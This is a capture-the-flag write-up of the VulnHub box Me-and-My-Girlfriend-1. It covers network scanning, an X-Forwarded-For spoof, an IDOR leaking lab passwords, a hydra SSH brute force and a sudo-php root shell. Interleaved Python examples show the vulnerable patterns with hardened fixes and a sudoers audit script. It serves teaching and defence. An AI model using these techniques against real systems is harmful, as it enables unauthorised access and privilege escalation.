vulnhub Me-and-My-Girlfriend-1
sudo arp-scan -l
┌──(jeremiah㉿kali)-[~/桌面]
└─$ sudo arp-scan -l
[sudo] jeremiah 的密码:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:49:c8:a6, IPv4: 192.168.0.112
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 90:76:9f:cd:9b:31 (Unknown)
192.168.0.106 b4:b5:b6:73:75:81 (Unknown)
192.168.0.110 00:0c:29:62:e3:74 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.932 seconds (132.51 hosts/sec). 3 responded
┌──(jeremiah㉿kali)-[~/桌面]
└─$
nmap -Pn -sV -p- -A 192.168.0.110
┌──(jeremiah㉿kali)-[~/桌面]
└─$ nmap -Pn -sV -p- -A 192.168.0.110
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 20:31 CST
Nmap scan report for 192.168.0.110 (192.168.0.110)
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
| 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
| 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
┌──(jeremiah㉿kali)-[~/桌面]
└─$
192.168.0.110 has ports 22 and 80 open.
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
Page source:
Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -->
Spoof the XFF header with a browser plugin:
X-Forwarded-For: 127.0.0.1
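The check behind that message fails because `X-Forwarded-For` is written by whoever sends the request. The following is an added example, not code from the box or the original writeup, showing the flawed address lookup beside one that only honours hops a trusted proxy appended; the addresses and the trusted-proxy set are constructed sample values.

```python
# Added example, not part of the original writeup: why an "only local" check
# that reads X-Forwarded-For is bypassable, and how to resolve the client
# address so that a spoofed header is ignored. Addresses and the
# trusted-proxy set are constructed sample values.
from ipaddress import ip_address
from typing import Optional

LOCAL_ADDRS = {"127.0.0.1", "::1"}


def client_ip_vulnerable(remote_addr: str, xff: Optional[str]) -> str:
    """The flawed pattern: prefer X-Forwarded-For whenever it is present.

    The header is written by whoever sends the request, so the sender
    chooses which address the server sees.
    """
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr: str, xff: Optional[str],
                       trusted_proxies: set) -> str:
    """Only honour X-Forwarded-For hops that a trusted proxy appended.

    Read the chain right to left: the TCP peer first, then the entries the
    proxies appended. The first hop that is not a trusted proxy is the real
    client; anything further left was supplied by the client and is ignored.
    With no trusted proxies the header is ignored entirely.
    """
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    hops.append(remote_addr)
    for hop in reversed(hops):
        try:
            ip_address(hop)  # reject non-addresses such as "localhost"
        except ValueError:
            return remote_addr
        if hop not in trusted_proxies:
            return hop
    # Every hop was a trusted proxy: fall back to the immediate peer.
    return remote_addr


def is_local_request(client_ip: str) -> bool:
    """The access rule the box enforces, applied to a resolved client IP."""
    return client_ip in LOCAL_ADDRS


if __name__ == "__main__":
    peer, spoofed = "192.168.0.112", "127.0.0.1"
    print("vulnerable:", is_local_request(client_ip_vulnerable(peer, spoofed)))
    print("hardened:  ", is_local_request(client_ip_hardened(peer, spoofed, set())))
```

With no reverse proxy in front of Apache, the correct trusted-proxy set is empty and `REMOTE_ADDR` is the only address worth consulting; a "local only" rule that reads any forwarded header without that allow-list is a client-controlled switch.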
dirb http://192.168.0.110/
┌──(jeremiah㉿kali)-[~/桌面]
└─$ dirb http://192.168.0.110/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jul 14 20:39:35 2022
URL_BASE: http://192.168.0.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.110/ ----
==> DIRECTORY: http://192.168.0.110/config/
+ http://192.168.0.110/index.php (CODE:200|SIZE:120)
==> DIRECTORY: http://192.168.0.110/misc/
+ http://192.168.0.110/robots.txt (CODE:200|SIZE:32)
+ http://192.168.0.110/server-status (CODE:403|SIZE:293)
---- Entering directory: http://192.168.0.110/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.0.110/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Thu Jul 14 20:39:41 2022
DOWNLOADED: 4612 - FOUND: 3
┌──(jeremiah㉿kali)-[~/桌面]
└─$
Checked these out; nothing useful.
After registering an account, a horizontal privilege escalation (IDOR) was found in the profile page, which exposed the following usernames and passwords:
user.txt
eweuhtandingan
aingmaung
alice
pwd.txt
skuyatuh
qwerty!!!
4lic3
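The IDOR comes down to a profile lookup that trusts the id in the request instead of tying it to the session. The following added example (not the box's code, and not from the original writeup) shows that lookup beside the version with the missing ownership check; the in-memory records are constructed sample data, with placeholder passwords rather than the leaked ones.

```python
# Added example, not part of the original writeup: the horizontal privilege
# escalation pattern behind the credential leak, with the ownership check
# that was missing. The "database" below is constructed sample data.
from dataclasses import dataclass
from typing import Callable, Dict, List


@dataclass
class Profile:
    user_id: int
    username: str
    password: str  # stored in clear text here because that is what the box leaks


# Constructed rows: usernames mirror the ones seen on the box, passwords are
# placeholders rather than the real leaked values.
PROFILES: Dict[int, Profile] = {
    1: Profile(1, "eweuhtandingan", "placeholder-1"),
    2: Profile(2, "aingmaung", "placeholder-2"),
    3: Profile(3, "alice", "placeholder-3"),
}


def view_profile_vulnerable(session_user_id: int, requested_id: int) -> Profile:
    """Returns whatever id the client asked for: any logged-in user can
    walk ?user_id=1,2,3,... and read every account, passwords included."""
    return PROFILES[requested_id]


def view_profile_hardened(session_user_id: int, requested_id: int) -> Profile:
    """Authorise the object, not just the session: the requested record must
    belong to the caller. PermissionError maps to an HTTP 403 in the handler."""
    if requested_id != session_user_id:
        raise PermissionError("profile does not belong to the current user")
    return PROFILES[requested_id]


def readable_accounts(session_user_id: int,
                      view: Callable[[int, int], Profile]) -> List[str]:
    """How many accounts one session can read through a given view function."""
    seen = []
    for uid in PROFILES:
        try:
            seen.append(view(session_user_id, uid).username)
        except PermissionError:
            pass
    return seen


if __name__ == "__main__":
    print("vulnerable:", readable_accounts(3, view_profile_vulnerable))
    print("hardened:  ", readable_accounts(3, view_profile_hardened))
```

The ownership check is the fix for the IDOR itself; the second defect, showing a password back on the profile page at all, is only closed by storing a hash and never rendering the stored value.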
hydra -L user.txt -P pwd.txt ssh://192.168.0.110
┌──(jeremiah㉿kali)-[~/桌面]
└─$ hydra -L user.txt -P pwd.txt ssh://192.168.0.110
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-14 20:48:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://192.168.0.110:22/
[22][ssh] host: 192.168.0.110 login: alice password: 4lic3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-14 20:48:28
┌──(jeremiah㉿kali)-[~/桌面]
└─$
user: alice
pwd: 4lic3
ssh alice@192.168.0.110
ls -al
cd .my_secret
ls
cat flag1.txt
alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
Now your last job is get access to the root and read the flag ^_^
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
CMD="/bin/sh"
sudo php -r "system('$CMD');"
whoami
cd /root
ls
cat flag2.txt
Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)
Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
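The root step above works because a sudo rule lets alice run `php`, and `php -r` executes arbitrary code, so that rule is equivalent to an unrestricted root shell. The following added example (not from the original writeup; the sudoers text is constructed, not the box's real file) audits sudoers rules for commands that hand out an interpreter or `ALL`, which is the check a defender would run on such a host.

```python
# Added example, not part of the original writeup: flag sudoers rules that
# grant an interpreter or ALL, since "sudo php -r ..." (or python, perl, a
# shell, ...) gives the rule's user arbitrary code execution as root.
# SAMPLE_SUDOERS is constructed sample data, not the box's actual sudoers.
import re
from typing import Dict, List

# Binaries that execute caller-supplied code; granting any of them via sudo is
# the same as granting a root shell. Non-exhaustive.
INTERPRETERS = {"php", "python", "python3", "perl", "ruby", "node", "sh", "bash"}

SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
alice   ALL=(ALL) NOPASSWD: /usr/bin/php
bob     ALL=(ALL) /usr/bin/systemctl restart apache2
%admin  ALL=(ALL) ALL
"""

# user_or_group  host = (runas) [NOPASSWD:] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$"
)


def risky_sudo_rules(sudoers_text: str) -> List[Dict]:
    """Return rules (other than root's own) whose command list contains an
    interpreter binary or the ALL keyword."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m.group("who") == "root":
            continue
        cmds = m.group("cmds")
        nopasswd = "NOPASSWD:" in cmds
        cmds = cmds.replace("NOPASSWD:", "").replace("PASSWD:", "")
        for cmd in cmds.split(","):
            cmd = cmd.strip()
            if not cmd:
                continue
            binary = cmd.split()[0]
            name = binary.rsplit("/", 1)[-1]      # /usr/bin/php -> php
            if cmd == "ALL" or name in INTERPRETERS:
                findings.append({"who": m.group("who"),
                                 "command": cmd,
                                 "nopasswd": nopasswd})
    return findings


if __name__ == "__main__":
    for f in risky_sudo_rules(SAMPLE_SUDOERS):
        flag = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"{f['who']}: {f['command']} ({flag})")
```

On a real host the input is `sudo -l` output or the files under `/etc/sudoers.d/`; the remediation is to scope the rule to a specific non-interpreter command with fixed arguments, or to drop it, since no argument restriction on `php` itself makes `-r` safe.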